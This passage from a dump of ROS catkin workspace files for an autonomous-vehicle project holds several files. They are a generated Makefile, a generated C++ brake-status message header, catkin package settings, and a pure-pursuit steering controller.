zf_msgs/CMakeFiles/std_msgs_generate_messages_lisp.dir/rule\n\n# Convenience name for target.\nstd_msgs_generate_messages_lisp: zf_msgs/CMakeFiles/std_msgs_generate_messages_lisp.dir/rule\n\n.PHONY : std_msgs_generate_messages_lisp\n\n# fast build rule for target.\nstd_msgs_generate_messages_lisp/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f zf_msgs/CMakeFiles/std_msgs_generate_messages_lisp.dir/build.make zf_msgs/CMakeFiles/std_msgs_generate_messages_lisp.dir/build\n.PHONY : std_msgs_generate_messages_lisp/fast\n\n# Convenience name for target.\nzf_msgs/CMakeFiles/geometry_msgs_generate_messages_py.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zf_msgs/CMakeFiles/geometry_msgs_generate_messages_py.dir/rule\n.PHONY : zf_msgs/CMakeFiles/geometry_msgs_generate_messages_py.dir/rule\n\n# Convenience name for target.\ngeometry_msgs_generate_messages_py: zf_msgs/CMakeFiles/geometry_msgs_generate_messages_py.dir/rule\n\n.PHONY : geometry_msgs_generate_messages_py\n\n# fast build rule for target.\ngeometry_msgs_generate_messages_py/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f zf_msgs/CMakeFiles/geometry_msgs_generate_messages_py.dir/build.make zf_msgs/CMakeFiles/geometry_msgs_generate_messages_py.dir/build\n.PHONY : geometry_msgs_generate_messages_py/fast\n\n# Convenience name for target.\nzf_msgs/CMakeFiles/_zf_msgs_generate_messages_check_deps_pos320.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zf_msgs/CMakeFiles/_zf_msgs_generate_messages_check_deps_pos320.dir/rule\n.PHONY : zf_msgs/CMakeFiles/_zf_msgs_generate_messages_check_deps_pos320.dir/rule\n\n# Convenience name for target.\n_zf_msgs_generate_messages_check_deps_pos320: zf_msgs/CMakeFiles/_zf_msgs_generate_messages_check_deps_pos320.dir/rule\n\n.PHONY : _zf_msgs_generate_messages_check_deps_pos320\n\n# fast build rule for 
target.\n_zf_msgs_generate_messages_check_deps_pos320/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f zf_msgs/CMakeFiles/_zf_msgs_generate_messages_check_deps_pos320.dir/build.make zf_msgs/CMakeFiles/_zf_msgs_generate_messages_check_deps_pos320.dir/build\n.PHONY : _zf_msgs_generate_messages_check_deps_pos320/fast\n\n# Convenience name for target.\nzf_msgs/CMakeFiles/zf_msgs_generate_messages_lisp.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zf_msgs/CMakeFiles/zf_msgs_generate_messages_lisp.dir/rule\n.PHONY : zf_msgs/CMakeFiles/zf_msgs_generate_messages_lisp.dir/rule\n\n# Convenience name for target.\nzf_msgs_generate_messages_lisp: zf_msgs/CMakeFiles/zf_msgs_generate_messages_lisp.dir/rule\n\n.PHONY : zf_msgs_generate_messages_lisp\n\n# fast build rule for target.\nzf_msgs_generate_messages_lisp/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f zf_msgs/CMakeFiles/zf_msgs_generate_messages_lisp.dir/build.make zf_msgs/CMakeFiles/zf_msgs_generate_messages_lisp.dir/build\n.PHONY : zf_msgs_generate_messages_lisp/fast\n\n# Convenience name for target.\nzf_msgs/CMakeFiles/zf_msgs_generate_messages_cpp.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zf_msgs/CMakeFiles/zf_msgs_generate_messages_cpp.dir/rule\n.PHONY : zf_msgs/CMakeFiles/zf_msgs_generate_messages_cpp.dir/rule\n\n# Convenience name for target.\nzf_msgs_generate_messages_cpp: zf_msgs/CMakeFiles/zf_msgs_generate_messages_cpp.dir/rule\n\n.PHONY : zf_msgs_generate_messages_cpp\n\n# fast build rule for target.\nzf_msgs_generate_messages_cpp/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f zf_msgs/CMakeFiles/zf_msgs_generate_messages_cpp.dir/build.make zf_msgs/CMakeFiles/zf_msgs_generate_messages_cpp.dir/build\n.PHONY : zf_msgs_generate_messages_cpp/fast\n\n# Convenience name for target.\nzf_msgs/CMakeFiles/zf_msgs_generate_messages_eus.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zf_msgs/CMakeFiles/zf_msgs_generate_messages_eus.dir/rule\n.PHONY : zf_msgs/CMakeFiles/zf_msgs_generate_messages_eus.dir/rule\n\n# Convenience name for target.\nzf_msgs_generate_messages_eus: zf_msgs/CMakeFiles/zf_msgs_generate_messages_eus.dir/rule\n\n.PHONY : zf_msgs_generate_messages_eus\n\n# fast build rule for target.\nzf_msgs_generate_messages_eus/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f zf_msgs/CMakeFiles/zf_msgs_generate_messages_eus.dir/build.make zf_msgs/CMakeFiles/zf_msgs_generate_messages_eus.dir/build\n.PHONY : zf_msgs_generate_messages_eus/fast\n\n# Convenience name for target.\nzf_msgs/CMakeFiles/zf_msgs_geneus.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zf_msgs/CMakeFiles/zf_msgs_geneus.dir/rule\n.PHONY : zf_msgs/CMakeFiles/zf_msgs_geneus.dir/rule\n\n# Convenience name for target.\nzf_msgs_geneus: zf_msgs/CMakeFiles/zf_msgs_geneus.dir/rule\n\n.PHONY : zf_msgs_geneus\n\n# fast build rule for target.\nzf_msgs_geneus/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f zf_msgs/CMakeFiles/zf_msgs_geneus.dir/build.make zf_msgs/CMakeFiles/zf_msgs_geneus.dir/build\n.PHONY : zf_msgs_geneus/fast\n\n# Convenience name for target.\nzf_msgs/CMakeFiles/geometry_msgs_generate_messages_cpp.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zf_msgs/CMakeFiles/geometry_msgs_generate_messages_cpp.dir/rule\n.PHONY : 
zf_msgs/CMakeFiles/geometry_msgs_generate_messages_cpp.dir/rule\n\n# Convenience name for target.\ngeometry_msgs_generate_messages_cpp: zf_msgs/CMakeFiles/geometry_msgs_generate_messages_cpp.dir/rule\n\n.PHONY : geometry_msgs_generate_messages_cpp\n\n# fast build rule for target.\ngeometry_msgs_generate_messages_cpp/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f zf_msgs/CMakeFiles/geometry_msgs_generate_messages_cpp.dir/build.make zf_msgs/CMakeFiles/geometry_msgs_generate_messages_cpp.dir/build\n.PHONY : geometry_msgs_generate_messages_cpp/fast\n\n# Convenience name for target.\nzf_msgs/CMakeFiles/zf_msgs_generate_messages_nodejs.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zf_msgs/CMakeFiles/zf_msgs_generate_messages_nodejs.dir/rule\n.PHONY : zf_msgs/CMakeFiles/zf_msgs_generate_messages_nodejs.dir/rule\n\n# Convenience name for target.\nzf_msgs_generate_messages_nodejs: zf_msgs/CMakeFiles/zf_msgs_generate_messages_nodejs.dir/rule\n\n.PHONY : zf_msgs_generate_messages_nodejs\n\n# fast build rule for target.\nzf_msgs_generate_messages_nodejs/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f zf_msgs/CMakeFiles/zf_msgs_generate_messages_nodejs.dir/build.make zf_msgs/CMakeFiles/zf_msgs_generate_messages_nodejs.dir/build\n.PHONY : zf_msgs_generate_messages_nodejs/fast\n\n# Convenience name for target.\nzf_msgs/CMakeFiles/_catkin_empty_exported_target.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zf_msgs/CMakeFiles/_catkin_empty_exported_target.dir/rule\n.PHONY : zf_msgs/CMakeFiles/_catkin_empty_exported_target.dir/rule\n\n# Convenience name for target.\n_catkin_empty_exported_target: zf_msgs/CMakeFiles/_catkin_empty_exported_target.dir/rule\n\n.PHONY : _catkin_empty_exported_target\n\n# fast build rule for target.\n_catkin_empty_exported_target/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f zf_msgs/CMakeFiles/_catkin_empty_exported_target.dir/build.make zf_msgs/CMakeFiles/_catkin_empty_exported_target.dir/build\n.PHONY : _catkin_empty_exported_target/fast\n\n# Convenience name for target.\nzf_msgs/CMakeFiles/zf_msgs_gennodejs.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zf_msgs/CMakeFiles/zf_msgs_gennodejs.dir/rule\n.PHONY : zf_msgs/CMakeFiles/zf_msgs_gennodejs.dir/rule\n\n# Convenience name for target.\nzf_msgs_gennodejs: zf_msgs/CMakeFiles/zf_msgs_gennodejs.dir/rule\n\n.PHONY : zf_msgs_gennodejs\n\n# fast build rule for target.\nzf_msgs_gennodejs/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f zf_msgs/CMakeFiles/zf_msgs_gennodejs.dir/build.make zf_msgs/CMakeFiles/zf_msgs_gennodejs.dir/build\n.PHONY : zf_msgs_gennodejs/fast\n\n# Help Target\nhelp:\n\t@echo \"The following are some of the valid targets for this Makefile:\"\n\t@echo \"... all (the default if no target is provided)\"\n\t@echo \"... clean\"\n\t@echo \"... depend\"\n\t@echo \"... list_install_components\"\n\t@echo \"... edit_cache\"\n\t@echo \"... test\"\n\t@echo \"... install/strip\"\n\t@echo \"... zf_msgs_genpy\"\n\t@echo \"... zf_msgs_gencpp\"\n\t@echo \"... geometry_msgs_generate_messages_eus\"\n\t@echo \"... zf_msgs_generate_messages_py\"\n\t@echo \"... std_msgs_generate_messages_py\"\n\t@echo \"... geometry_msgs_generate_messages_nodejs\"\n\t@echo \"... zf_msgs_generate_messages\"\n\t@echo \"... std_msgs_generate_messages_nodejs\"\n\t@echo \"... std_msgs_generate_messages_cpp\"\n\t@echo \"... 
_zf_msgs_generate_messages_check_deps_pose2dArray\"\n\t@echo \"... std_msgs_generate_messages_eus\"\n\t@echo \"... install\"\n\t@echo \"... zf_msgs_genlisp\"\n\t@echo \"... geometry_msgs_generate_messages_lisp\"\n\t@echo \"... std_msgs_generate_messages_lisp\"\n\t@echo \"... geometry_msgs_generate_messages_py\"\n\t@echo \"... _zf_msgs_generate_messages_check_deps_pos320\"\n\t@echo \"... zf_msgs_generate_messages_lisp\"\n\t@echo \"... zf_msgs_generate_messages_cpp\"\n\t@echo \"... rebuild_cache\"\n\t@echo \"... zf_msgs_generate_messages_eus\"\n\t@echo \"... zf_msgs_geneus\"\n\t@echo \"... geometry_msgs_generate_messages_cpp\"\n\t@echo \"... zf_msgs_generate_messages_nodejs\"\n\t@echo \"... install/local\"\n\t@echo \"... _catkin_empty_exported_target\"\n\t@echo \"... zf_msgs_gennodejs\"\n.PHONY : help\n\n\n\n#=============================================================================\n# Special targets to cleanup operation of make.\n\n# Special rule to run CMake to check the build system integrity.\n# No rule that depends on this can have commands that come from listfiles\n# because they might be regenerated.\ncmake_check_build_system:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(CMAKE_COMMAND) -H$(CMAKE_SOURCE_DIR) -B$(CMAKE_BINARY_DIR) --check-build-system CMakeFiles/Makefile.cmake 0\n.PHONY : cmake_check_build_system\n\n"
},
{
"alpha_fraction": 0.7686375379562378,
"alphanum_fraction": 0.7969151735305786,
"avg_line_length": 31.41666603088379,
"blob_id": "0e30ba38f2c253f10b9faaa779d4e6689dbe3d63",
"content_id": "03a199de2d8735e95c060550a2443251003bbfb5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 389,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 12,
"path": "/build/CTestTestfile.cmake",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "# CMake generated Testfile for \n# Source directory: /home/zf/xuechong_ws/zhuifengShow0919/src\n# Build directory: /home/zf/xuechong_ws/zhuifengShow0919/build\n# \n# This file includes the relevant testing commands required for \n# testing this directory and lists subdirectories to be tested as well.\nsubdirs(gtest)\nsubdirs(zf_msgs)\nsubdirs(path)\nsubdirs(pos320)\nsubdirs(steer)\nsubdirs(zfmsg)\n"
},
{
"alpha_fraction": 0.654236376285553,
"alphanum_fraction": 0.6679404377937317,
"avg_line_length": 26.007118225097656,
"blob_id": "b981119c5272b5715532bcec583297263e529d0c",
"content_id": "9d548202b5fc05a2a762b37dc7dcc87f54cb2f18",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 7589,
"license_type": "no_license",
"max_line_length": 441,
"num_lines": 281,
"path": "/devel/include/zfmsg/BreakStatus.h",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "// Generated by gencpp from file zfmsg/BreakStatus.msg\n// DO NOT EDIT!\n\n\n#ifndef ZFMSG_MESSAGE_BREAKSTATUS_H\n#define ZFMSG_MESSAGE_BREAKSTATUS_H\n\n\n#include <string>\n#include <vector>\n#include <map>\n\n#include <ros/types.h>\n#include <ros/serialization.h>\n#include <ros/builtin_message_traits.h>\n#include <ros/message_operations.h>\n\n#include <std_msgs/Header.h>\n\nnamespace zfmsg\n{\ntemplate <class ContainerAllocator>\nstruct BreakStatus_\n{\n typedef BreakStatus_<ContainerAllocator> Type;\n\n BreakStatus_()\n : header()\n , ts(0)\n , controlMode(0)\n , pressure(0.0)\n , speed(0.0)\n , targetPressure(0.0)\n , targetSpeed(0.0)\n , pedalBreak(0)\n , errorCode(0) {\n }\n BreakStatus_(const ContainerAllocator& _alloc)\n : header(_alloc)\n , ts(0)\n , controlMode(0)\n , pressure(0.0)\n , speed(0.0)\n , targetPressure(0.0)\n , targetSpeed(0.0)\n , pedalBreak(0)\n , errorCode(0) {\n (void)_alloc;\n }\n\n\n\n typedef ::std_msgs::Header_<ContainerAllocator> _header_type;\n _header_type header;\n\n typedef int64_t _ts_type;\n _ts_type ts;\n\n typedef uint8_t _controlMode_type;\n _controlMode_type controlMode;\n\n typedef float _pressure_type;\n _pressure_type pressure;\n\n typedef float _speed_type;\n _speed_type speed;\n\n typedef float _targetPressure_type;\n _targetPressure_type targetPressure;\n\n typedef float _targetSpeed_type;\n _targetSpeed_type targetSpeed;\n\n typedef uint8_t _pedalBreak_type;\n _pedalBreak_type pedalBreak;\n\n typedef uint8_t _errorCode_type;\n _errorCode_type errorCode;\n\n\n\n\n\n typedef boost::shared_ptr< ::zfmsg::BreakStatus_<ContainerAllocator> > Ptr;\n typedef boost::shared_ptr< ::zfmsg::BreakStatus_<ContainerAllocator> const> ConstPtr;\n\n}; // struct BreakStatus_\n\ntypedef ::zfmsg::BreakStatus_<std::allocator<void> > BreakStatus;\n\ntypedef boost::shared_ptr< ::zfmsg::BreakStatus > BreakStatusPtr;\ntypedef boost::shared_ptr< ::zfmsg::BreakStatus const> BreakStatusConstPtr;\n\n// constants requiring out of line definition\n\n\n\ntemplate<typename ContainerAllocator>\nstd::ostream& operator<<(std::ostream& s, const ::zfmsg::BreakStatus_<ContainerAllocator> & v)\n{\nros::message_operations::Printer< ::zfmsg::BreakStatus_<ContainerAllocator> >::stream(s, \"\", v);\nreturn s;\n}\n\n} // namespace zfmsg\n\nnamespace ros\n{\nnamespace message_traits\n{\n\n\n\n// BOOLTRAITS {'IsFixedSize': False, 'IsMessage': True, 'HasHeader': True}\n// {'std_msgs': ['/opt/ros/kinetic/share/std_msgs/cmake/../msg'], 'zfmsg': ['/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg']}\n\n// !!!!!!!!!!! 
['__class__', '__delattr__', '__dict__', '__doc__', '__eq__', '__format__', '__getattribute__', '__hash__', '__init__', '__module__', '__ne__', '__new__', '__reduce__', '__reduce_ex__', '__repr__', '__setattr__', '__sizeof__', '__str__', '__subclasshook__', '__weakref__', '_parsed_fields', 'constants', 'fields', 'full_name', 'has_header', 'header_present', 'names', 'package', 'parsed_fields', 'short_name', 'text', 'types']\n\n\n\n\ntemplate <class ContainerAllocator>\nstruct IsFixedSize< ::zfmsg::BreakStatus_<ContainerAllocator> >\n : FalseType\n { };\n\ntemplate <class ContainerAllocator>\nstruct IsFixedSize< ::zfmsg::BreakStatus_<ContainerAllocator> const>\n : FalseType\n { };\n\ntemplate <class ContainerAllocator>\nstruct IsMessage< ::zfmsg::BreakStatus_<ContainerAllocator> >\n : TrueType\n { };\n\ntemplate <class ContainerAllocator>\nstruct IsMessage< ::zfmsg::BreakStatus_<ContainerAllocator> const>\n : TrueType\n { };\n\ntemplate <class ContainerAllocator>\nstruct HasHeader< ::zfmsg::BreakStatus_<ContainerAllocator> >\n : TrueType\n { };\n\ntemplate <class ContainerAllocator>\nstruct HasHeader< ::zfmsg::BreakStatus_<ContainerAllocator> const>\n : TrueType\n { };\n\n\ntemplate<class ContainerAllocator>\nstruct MD5Sum< ::zfmsg::BreakStatus_<ContainerAllocator> >\n{\n static const char* value()\n {\n return \"9f94464581d3b80147ade7f255eccdd3\";\n }\n\n static const char* value(const ::zfmsg::BreakStatus_<ContainerAllocator>&) { return value(); }\n static const uint64_t static_value1 = 0x9f94464581d3b801ULL;\n static const uint64_t static_value2 = 0x47ade7f255eccdd3ULL;\n};\n\ntemplate<class ContainerAllocator>\nstruct DataType< ::zfmsg::BreakStatus_<ContainerAllocator> >\n{\n static const char* value()\n {\n return \"zfmsg/BreakStatus\";\n }\n\n static const char* value(const ::zfmsg::BreakStatus_<ContainerAllocator>&) { return value(); }\n};\n\ntemplate<class ContainerAllocator>\nstruct Definition< ::zfmsg::BreakStatus_<ContainerAllocator> >\n{\n static const char* value()\n {\n return \"std_msgs/Header header\\n\\\nint64 ts\\n\\\nuint8 controlMode\\n\\\nfloat32 pressure\\n\\\nfloat32 speed\\n\\\nfloat32 targetPressure\\n\\\nfloat32 targetSpeed\\n\\\nuint8 pedalBreak\\n\\\nuint8 errorCode\\n\\\n\\n\\\n\\n\\\n\\n\\\n================================================================================\\n\\\nMSG: std_msgs/Header\\n\\\n# Standard metadata for higher-level stamped data types.\\n\\\n# This is generally used to communicate timestamped data \\n\\\n# in a particular coordinate frame.\\n\\\n# \\n\\\n# sequence ID: consecutively increasing ID \\n\\\nuint32 seq\\n\\\n#Two-integer timestamp that is expressed as:\\n\\\n# * stamp.sec: seconds (stamp_secs) since epoch (in Python the variable is called 'secs')\\n\\\n# * stamp.nsec: nanoseconds since stamp_secs (in Python the variable is called 'nsecs')\\n\\\n# time-handling sugar is provided by the client library\\n\\\ntime stamp\\n\\\n#Frame this data is associated with\\n\\\n# 0: no frame\\n\\\n# 1: global frame\\n\\\nstring frame_id\\n\\\n\";\n }\n\n static const char* value(const ::zfmsg::BreakStatus_<ContainerAllocator>&) { return value(); }\n};\n\n} // namespace message_traits\n} // namespace ros\n\nnamespace ros\n{\nnamespace serialization\n{\n\n template<class ContainerAllocator> struct Serializer< ::zfmsg::BreakStatus_<ContainerAllocator> >\n {\n template<typename Stream, typename T> inline static void allInOne(Stream& stream, T m)\n {\n stream.next(m.header);\n stream.next(m.ts);\n stream.next(m.controlMode);\n 
stream.next(m.pressure);\n stream.next(m.speed);\n stream.next(m.targetPressure);\n stream.next(m.targetSpeed);\n stream.next(m.pedalBreak);\n stream.next(m.errorCode);\n }\n\n ROS_DECLARE_ALLINONE_SERIALIZER\n }; // struct BreakStatus_\n\n} // namespace serialization\n} // namespace ros\n\nnamespace ros\n{\nnamespace message_operations\n{\n\ntemplate<class ContainerAllocator>\nstruct Printer< ::zfmsg::BreakStatus_<ContainerAllocator> >\n{\n template<typename Stream> static void stream(Stream& s, const std::string& indent, const ::zfmsg::BreakStatus_<ContainerAllocator>& v)\n {\n s << indent << \"header: \";\n s << std::endl;\n Printer< ::std_msgs::Header_<ContainerAllocator> >::stream(s, indent + \" \", v.header);\n s << indent << \"ts: \";\n Printer<int64_t>::stream(s, indent + \" \", v.ts);\n s << indent << \"controlMode: \";\n Printer<uint8_t>::stream(s, indent + \" \", v.controlMode);\n s << indent << \"pressure: \";\n Printer<float>::stream(s, indent + \" \", v.pressure);\n s << indent << \"speed: \";\n Printer<float>::stream(s, indent + \" \", v.speed);\n s << indent << \"targetPressure: \";\n Printer<float>::stream(s, indent + \" \", v.targetPressure);\n s << indent << \"targetSpeed: \";\n Printer<float>::stream(s, indent + \" \", v.targetSpeed);\n s << indent << \"pedalBreak: \";\n Printer<uint8_t>::stream(s, indent + \" \", v.pedalBreak);\n s << indent << \"errorCode: \";\n Printer<uint8_t>::stream(s, indent + \" \", v.errorCode);\n }\n};\n\n} // namespace message_operations\n} // namespace ros\n\n#endif // ZFMSG_MESSAGE_BREAKSTATUS_H\n"
},
{
"alpha_fraction": 0.7111111283302307,
"alphanum_fraction": 0.7170370221138,
"avg_line_length": 41.25,
"blob_id": "912a115893b330769ba4ae0701c24b0aec65d184",
"content_id": "101e1b1c17da182543a3eab4664b2886a318a781",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 675,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 16,
"path": "/build/path/catkin_generated/package.cmake",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "set(_CATKIN_CURRENT_PACKAGE \"path\")\nset(path_VERSION \"0.1.0\")\nset(path_MAINTAINER \"Your Name <[email protected]>\")\nset(path_PACKAGE_FORMAT \"2\")\nset(path_BUILD_DEPENDS \"roscpp\" \"rospy\" \"std_msgs\" \"nav_msgs\" \"geometry_msgs\" \"zf_msgs\")\nset(path_BUILD_EXPORT_DEPENDS )\nset(path_BUILDTOOL_DEPENDS \"catkin\")\nset(path_BUILDTOOL_EXPORT_DEPENDS )\nset(path_EXEC_DEPENDS \"roscpp\" \"rospy\" \"std_msgs\" \"nav_msgs\" \"geometry_msgs\" \"zf_msgs\")\nset(path_RUN_DEPENDS \"roscpp\" \"rospy\" \"std_msgs\" \"nav_msgs\" \"geometry_msgs\" \"zf_msgs\")\nset(path_TEST_DEPENDS )\nset(path_DOC_DEPENDS )\nset(path_URL_WEBSITE \"http://wiki.ros.org/path\")\nset(path_URL_BUGTRACKER \"\")\nset(path_URL_REPOSITORY \"\")\nset(path_DEPRECATED \"\")"
},
{
"alpha_fraction": 0.6324324607849121,
"alphanum_fraction": 0.654826283454895,
"avg_line_length": 26.553192138671875,
"blob_id": "9f1a1c633fd15c32c9ebdd93dfc3ad86eae8e87d",
"content_id": "ead18ddeaee61e41a7e8cffadf145cc70d6a37ac",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 3885,
"license_type": "no_license",
"max_line_length": 183,
"num_lines": 141,
"path": "/src/steer/src/pure_pursuit.cpp",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "#include \"ros/ros.h\"\n#include \"zf_msgs/pos320.h\"\n#include \"zf_msgs/pose2dArray.h\"\n#include \"std_msgs/String.h\"\n#include \"std_msgs/Float32.h\"\n#include \"std_msgs/Int32.h\"\n#include \"geometry_msgs/TwistStamped.h\"\n#include \"geometry_msgs/PoseStamped.h\"\n#include \"geometry_msgs/Pose.h\"\n#include <cmath>\n\n/**\n * XUECHONG 2018.09.06, pure pursuit path following\n */\n\n/// important parameters, need fine-tuning\nconst int LOOP_RATE_ = 20;\n//wheel base length\nconst double WB = 2;\n//min look ahead distance\n//wheel steer gain\n//const int K_STEER = 100;\nconst double Lfc = 3;\nconst int K_STEER = 550;\nconst int K_DEVIA = 40;\nconst int OFFSET_STEER = -75;\nint getWheelAngle(const double &delta, const double &devia){\n int angle = int(K_STEER * delta + devia * K_DEVIA) + OFFSET_STEER;\n return angle;\n}\n//look ahead distance\ninline double getPreDis(double vel){\n return log(1+vel) + vel*0.8 + Lfc;\n}\n\nbool is_waypoints_set = false;\nbool is_pose_set = false;\n\nzf_msgs::pose2dArray waypoints;\nzf_msgs::pos320 pose;\n\nvoid waypointsCallback(const zf_msgs::pose2dArray msg)\n{\n ///\n ROS_INFO(\"I got waypoints data: \");\n waypoints = msg;\n is_waypoints_set = true;\n}\n\n\nvoid currentPoseCallback(const zf_msgs::pos320 msg)\n{\n ///\n ROS_INFO(\"I got current pose data: \");\n pose = msg;\n is_pose_set = true;\n}\n\nint getTargetPoint(double dis)\n{\n int target = 1;\n double L = 0;\n while(L < dis && target < waypoints.points.size())\n {\n L += ( sqrt( pow( waypoints.points[target].x - waypoints.points[target -1].x ,2) + \n pow( waypoints.points[target].y - waypoints.points[target -1].y, 2) ) );\n ++target;\n }\n return target;\n}\n\nint main(int argc, char **argv)\n{\n ros::init(argc, argv, \"pure_pursuit\");\n\n ros::NodeHandle n;\n\n ros::Subscriber subWaypoints = n.subscribe(\"gps_waypoints\", 1000, waypointsCallback);\n ros::Subscriber subCurrentPose = n.subscribe(\"pos320_pose\", 1000, currentPoseCallback);\n ros::Publisher pubWheelSteer = n.advertise<std_msgs::Int32>(\"/cmd/steer_cmd\",1000);\n //ros::Publisher pubWheelSteer = n.advertise<std_msgs::Int32>(\"pure_pursuit_steer\",1000);\n\n int markPoint = 0;\n int targetPoint = 0;\n double forwardDis = 0;\n double alpha = 0;\n std_msgs::Int32 wheel_steer;\n\n geometry_msgs::TwistStamped wheelMsg;\n\n ROS_INFO_STREAM(\"pure pursuit start\");\n ros::Rate loop_rate(LOOP_RATE_);\n while (ros::ok())\n {\n ros::spinOnce();\n /// check if subscribed data\n /// two selections\n if (!is_waypoints_set || !is_pose_set)\n {\n ROS_WARN(\"Necessary topics are not subscribed yet ... 
\");\n loop_rate.sleep();\n continue;\n }\n is_pose_set = false;\n is_waypoints_set = false;\n\n if(waypoints.points.size() < 10){\n continue;\n }\n\n /// compute wheel steer\n /// get nearest point and dis\n markPoint = 0;\n targetPoint = 0;\n\n /// get forward dis\n double velocity = std::sqrt( std::pow(pose.v_e,2) + std::pow(pose.v_n,2) + std::pow(pose.v_earth,2));\n forwardDis = getPreDis(velocity);\n ///std::cout<< \"forward dis is : \"<< forwardDis << \"\\n\";\n\n /// get target point \n targetPoint = getTargetPoint(forwardDis);\n std::cout<< \"target point is : \"<< targetPoint << \"\\n\";\n\n /// forward ->y, right-> x\n /// two selections\n //alpha = atan( (waypoints[targetPoint].pose.position.y - waypoints[markPoint].pose.position.y) /(waypoints[targetPoint].pose.position.x - waypoints[markPoint].pose.position.x) );\n alpha = atan( (waypoints.points[targetPoint].x) /(waypoints.points[targetPoint].y) );\n alpha = atan(2.0 * WB * sin(alpha) / forwardDis);\n\n wheel_steer.data = getWheelAngle(alpha, waypoints.points[int(targetPoint/2)].x);\n pubWheelSteer.publish(wheel_steer);\n std::cout << waypoints.points[targetPoint].x << \"\\t\" << waypoints.points[targetPoint].y << \"\\n\\n\";\n std::cout<< wheel_steer.data - OFFSET_STEER << \"\\n\";\n\n loop_rate.sleep();\n }\n\n\n return 0;\n}\n"
},
{
"alpha_fraction": 0.7142857313156128,
"alphanum_fraction": 0.7142857313156128,
"avg_line_length": 27,
"blob_id": "cef3e7f4e7b6bcd9d541a7fbe632121092f9860c",
"content_id": "95df62b4eb8e6c1152cc0ea00591f103035b5343",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 56,
"license_type": "no_license",
"max_line_length": 27,
"num_lines": 2,
"path": "/build/steer/catkin_generated/steer-msg-extras.cmake.installspace.in",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "set(steer_MESSAGE_FILES \"\")\nset(steer_SERVICE_FILES \"\")\n"
},
{
"alpha_fraction": 0.8103448152542114,
"alphanum_fraction": 0.8103448152542114,
"avg_line_length": 86,
"blob_id": "624eb7ad413cd33b38ce4e1513f824ec21edd729",
"content_id": "021d90c1831e17ff099b2eb00062558d0f23f738",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 174,
"license_type": "no_license",
"max_line_length": 145,
"num_lines": 2,
"path": "/build/zfmsg/catkin_generated/installspace/zfmsg-msg-extras.cmake",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "set(zfmsg_MESSAGE_FILES \"msg/SteerStatus.msg;msg/BreakStatus.msg;msg/ThrottleGearStatus.msg;msg/MotionCmd.msg;msg/CanInfo.msg;msg/CanInfoAW.msg\")\nset(zfmsg_SERVICE_FILES \"\")\n"
},
{
"alpha_fraction": 0.7609195113182068,
"alphanum_fraction": 0.7885057330131531,
"avg_line_length": 42.5,
"blob_id": "4c998e86b337df7955c274f93bb97ec4075c912c",
"content_id": "38aeaec122fe27d3c1595495bc4dbc6ffca6904d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 435,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 10,
"path": "/build/zf_msgs/CMakeFiles/zf_msgs_generate_messages_lisp.dir/cmake_clean.cmake",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
